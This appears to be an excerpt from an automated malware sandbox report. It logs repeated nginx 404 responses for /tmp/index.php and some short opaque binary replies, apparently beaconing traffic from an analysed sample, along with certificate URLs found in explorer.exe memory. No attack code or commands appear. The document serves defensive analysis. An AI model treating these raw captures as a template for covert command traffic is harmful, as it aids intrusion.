                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:15 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:19 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:28:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:37 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:29:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:30:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000001.00000000.1724600105.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000001.00000000.1724600105.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
                Source: explorer.exe, 00000001.00000000.1726201886.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
                Source: explorer.exe, 00000001.00000000.1726891163.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725351685.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1725731451.0000000008720000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
